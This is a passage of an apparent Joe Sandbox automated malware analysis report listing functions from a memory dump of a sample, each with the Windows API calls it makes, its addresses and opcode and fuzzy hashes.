                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
                                                                                              • Opcode ID: fba82c0aa068c5562b6699b73bb903d727f3ae0d836859c59312de60e55cd848
                                                                                              • Instruction ID: 018c3556ebc384e272b459eebfec7028ee01c8c8f051d55ef4498da39268f53b
                                                                                              • Opcode Fuzzy Hash: fba82c0aa068c5562b6699b73bb903d727f3ae0d836859c59312de60e55cd848
                                                                                              • Instruction Fuzzy Hash: FC014E722047056BEB218F65D845D59FBDCEB85370F25062DE5C4832C0EA70A905C774
                                                                                              Function 00D8E992 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                                                                              • Instruction ID: 3661ae0e2951595da119662f40ee6a0ce570439b1d020c77678c4e91958c988e
                                                                                              • Opcode Fuzzy Hash: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                                                                              • Instruction Fuzzy Hash: 75F0F432500620AACB213B6ADC05B6A3398DF42734F150715F865931D1EFF4D8028FB1
                                                                                              Function 00D9500D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00D931B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 00D9504E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: bba4c20edcd3e3e7bb893f70210b4d0a4c3e479c992362dc8865badfde09de0b
                                                                                              • Instruction ID: ffeab4248abac76ea7ba58455eaf05c0332dea733cf2df0564a538905c872db8
                                                                                              • Opcode Fuzzy Hash: bba4c20edcd3e3e7bb893f70210b4d0a4c3e479c992362dc8865badfde09de0b
                                                                                              • Instruction Fuzzy Hash: B9F0B431A01A246ADF322E62FC05B5A3748FB407A1B188135A84DDA198DA34D80187F0
                                                                                              Function 00D93BB0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00D86A99,?,0000015D,?,?,?,?,00D885D0,000000FF,00000000,?,?), ref: 00D93BE2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 1803662b74ae908cd2a8fedc528b060b31816637f1f71f025247cd617d4bf720
                                                                                              • Instruction ID: c6e994e2bbcd852bbe52f9e2cdff0f1a1f0c5a7ad3e9926974862460085767e1
                                                                                              • Opcode Fuzzy Hash: 1803662b74ae908cd2a8fedc528b060b31816637f1f71f025247cd617d4bf720
                                                                                              • Instruction Fuzzy Hash: 8DE0653120461557DF31366AEC05F9A3A59DB417A4F194221AC56D61A0DB71DD0083F1
                                                                                              Function 00D663DB Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 909623b9b0d456d333bef9aa1b9f5fc568013a7f61c6778e3a2ca59cfa114cf5
                                                                                              • Instruction ID: ed80edccb63d430034c5e9039070b74fb303465f8ff61074e81be8b0f3f289d1
                                                                                              • Opcode Fuzzy Hash: 909623b9b0d456d333bef9aa1b9f5fc568013a7f61c6778e3a2ca59cfa114cf5
                                                                                              • Instruction Fuzzy Hash: A7F0C971505712CFCB349F64E494826BBE5FF1532A3288A7EE1D782624C771E844DF60
                                                                                              Function 00D6653A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock
                                                                                              • String ID:
                                                                                              • API String ID: 2638373210-0
                                                                                              • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                              • Instruction ID: 11c71ba9ecf8d90e70f826b139e653218a1aea66527277d5289d2df4661f4d34
                                                                                              • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                              • Instruction Fuzzy Hash: 28F0F87140020DFFDF05DF90C941E9E7B79FB05318F208445F9159A152D336DA21EBA1
                                                                                              Function 00D64154 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 176396367-0
                                                                                              • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                                                              • Instruction ID: 1a0246b4b527ca32a284bd72c4c98af0ea1b425cf58c1cea4c6936c81dc67397
                                                                                              • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                                                              • Instruction Fuzzy Hash: 97D0C76374255135B669313D6D4BD7F895CCFC26A1B15457FFA06CA1A5ED444C0302F1
                                                                                              Function 00DCE783 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DCE7A2
                                                                                                • Part of subcall function 00D684B7: _wcslen.LIBCMT ref: 00D684CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: NamePathShort_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2021730007-0
                                                                                              • Opcode ID: b7fb28a0618a9bc2d13242e6c79a119927b9be4dc3b3078cf62b23743955ee2a
                                                                                              • Instruction ID: 241143b1261d4132e748761c99c8a82737673fedc8ad0b4c531a7ad2faa173dc
                                                                                              • Opcode Fuzzy Hash: b7fb28a0618a9bc2d13242e6c79a119927b9be4dc3b3078cf62b23743955ee2a
                                                                                              • Instruction Fuzzy Hash: D3E0CD7250022457C71093589C05FEA77EEDFC8790F044170FC05D7248DD64ED80D5B4
                                                                                              Function 00D7F13C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,?,00D6B0DE,?,?,00000000,?,00D66B73,?), ref: 00D7F156
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: 48df392e78e747d3877410df2e946631b57610b10f95903c7088f13aa3575471
                                                                                              • Instruction ID: 2eb8ed4153be78bde4b2435a287fa5e3cef467471152c5634f39bac6e7691645
                                                                                              • Opcode Fuzzy Hash: 48df392e78e747d3877410df2e946631b57610b10f95903c7088f13aa3575471
                                                                                              • Instruction Fuzzy Hash: 69E092B5910704AFD728DF55D846DA7BBF8EB08310B00455EA85693740E7B1BD44CB60
                                                                                              Function 00D639DE Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D639FD
                                                                                                • Part of subcall function 00D684B7: _wcslen.LIBCMT ref: 00D684CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongNamePath_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 541455249-0
                                                                                              • Opcode ID: 2fb1d7e33c5d2cbc7db8e0114cc92ac80132eaecc5bc51b96a34f3f0f68c6b6c
                                                                                              • Instruction ID: 2a26dcd2a8d78270f675efa82cb52f6e10adfbd81f11026fc8e61f483a678575
                                                                                              • Opcode Fuzzy Hash: 2fb1d7e33c5d2cbc7db8e0114cc92ac80132eaecc5bc51b96a34f3f0f68c6b6c
                                                                                              • Instruction Fuzzy Hash: D7E0C272A002245BCB20A29C9C0AFEA77EEDFC8790F0441B1FC09D7248DDA4ED80D6B4
                                                                                              Function 00DCE753 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00DCE76C
                                                                                                • Part of subcall function 00D684B7: _wcslen.LIBCMT ref: 00D684CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderPath_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2987691875-0
                                                                                              • Opcode ID: 716de649cf0f3be330ec8e99c883b14f4c50acf0aa7f172485dba00bb99934d9
                                                                                              • Instruction ID: 4fb71fd0093184c567f4ca1f2de931084f81136ae07232f6b6b25ae1300f0996
                                                                                              • Opcode Fuzzy Hash: 716de649cf0f3be330ec8e99c883b14f4c50acf0aa7f172485dba00bb99934d9
                                                                                              • Instruction Fuzzy Hash: F3D05EA19003282BDF60A6749C0DDB73AADC740214F0046A0786DD3242ED34ED4486B0
                                                                                              Function 00DCDA5C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00DCD9DC,?,?), ref: 00DCDA72
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CopyFile
                                                                                              • String ID:
                                                                                              • API String ID: 1304948518-0
                                                                                              • Opcode ID: 330fe39fd0bf53ed6b3f282b091f3291a5b4fa59f5eae237757a7170a8924986
                                                                                              • Instruction ID: 122f6768e8acb2529858e9cc6b9e8f635c153db4d030ec7aa701eb184dc7e0c0
                                                                                              • Opcode Fuzzy Hash: 330fe39fd0bf53ed6b3f282b091f3291a5b4fa59f5eae237757a7170a8924986
                                                                                              • Instruction Fuzzy Hash: 8FD0A7305D0208BBEF108B50CC03F9DB76DE701B45F204194B101EA0D0C7B5A5089764
                                                                                              Function 00DA073A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,00000000,?,00DA0AA4,?,?,00000000,?,00DA0AA4,00000000,0000000C), ref: 00DA0757
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 8e8db90a631db3c969d2c88124cb7b1025c08583a454dce85db9909848b3c457
                                                                                              • Instruction ID: 50c13684981448854a687cbd566b046f6487707e41321fb0f6c01c0447004e3b
                                                                                              • Opcode Fuzzy Hash: 8e8db90a631db3c969d2c88124cb7b1025c08583a454dce85db9909848b3c457
                                                                                              • Instruction Fuzzy Hash: 63D06C3200020DBBDF028F84DD06EDA3BAAFB48714F018000BE1896120C732E831EB90
                                                                                              Function 00DCE9C5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,00DCD755), ref: 00DCE9C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 67c258160ea730f8f7ded2155220eee4d5a73816addd077f3fe94c3bca78cee2
                                                                                              • Instruction ID: c15e942c59062dd2a51453ed26e7cbfc3cf8afff7f05921d64e07c7dbf4fd2cc
                                                                                              • Opcode Fuzzy Hash: 67c258160ea730f8f7ded2155220eee4d5a73816addd077f3fe94c3bca78cee2
                                                                                              • Instruction Fuzzy Hash: 67B092A400061105BD780B381A0CAA9330268433A67DC1B99E4B9962E2CB3D890BEA30
                                                                                              Function 00DD6561 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00DCDB69: FindFirstFileW.KERNELBASE(?,?), ref: 00DCDBE0
                                                                                                • Part of subcall function 00DCDB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 00DCDC30
                                                                                                • Part of subcall function 00DCDB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 00DCDC41
                                                                                                • Part of subcall function 00DCDB69: FindClose.KERNEL32(00000000), ref: 00DCDC58
                                                                                              • GetLastError.KERNEL32 ref: 00DD6583
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                              • String ID:
                                                                                              • API String ID: 2191629493-0
                                                                                              • Opcode ID: da07576f0280f76f41eecc43e0477422676b2beea9457b085c8617801d952568
                                                                                              • Instruction ID: 41d210f477d9206231f07a853e544605bad730d1bebbcbbdf3155c08beb2a365
                                                                                              • Opcode Fuzzy Hash: da07576f0280f76f41eecc43e0477422676b2beea9457b085c8617801d952568
                                                                                              • Instruction Fuzzy Hash: B1F058322002048FCB14AF98D844B6AB7E6EF48720F058419F90A8B362CB71BC418BB4
                                                                                              Function 00D67953 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(?,?,00000000,00DA3A1C), ref: 00D67973
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: fe142b20d1babfb9f6c085a7ba5a9ac0b1f672f9b20758207d5bf83a5961be3d
                                                                                              • Instruction ID: eabc5f76e731ba2170c075bf432c817a5fbf624c905863178b0e7a29299945b4
                                                                                              • Opcode Fuzzy Hash: fe142b20d1babfb9f6c085a7ba5a9ac0b1f672f9b20758207d5bf83a5961be3d
                                                                                              • Instruction Fuzzy Hash: 00E09275404B12CFD7314F1AE804422FBE5FFD23653254A2FD1E582660D3B05886CF60

                                                                                              Non-executed Functions

                                                                                              Function 00DDA0FA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00DDA11B
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00DDA176
                                                                                              • FindClose.KERNEL32(00000000), ref: 00DDA181
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00DDA19D
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DDA1ED
                                                                                              • SetCurrentDirectoryW.KERNEL32(00E27B94), ref: 00DDA20B
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DDA215
                                                                                              • FindClose.KERNEL32(00000000), ref: 00DDA222
                                                                                              • FindClose.KERNEL32(00000000), ref: 00DDA232
                                                                                                • Part of subcall function 00DCE2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DCE2C9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                              • String ID: *.*
                                                                                              • API String ID: 2640511053-438819550
                                                                                              • Opcode ID: afb4023a1d9248a5f4989e7256ab201be08bf7cea6e329a4c1b64aa13695ef79
                                                                                              • Instruction ID: a09a150dce36611ebee698d8bfb62b38353b3efdf847a781dd97711f47ecca4e
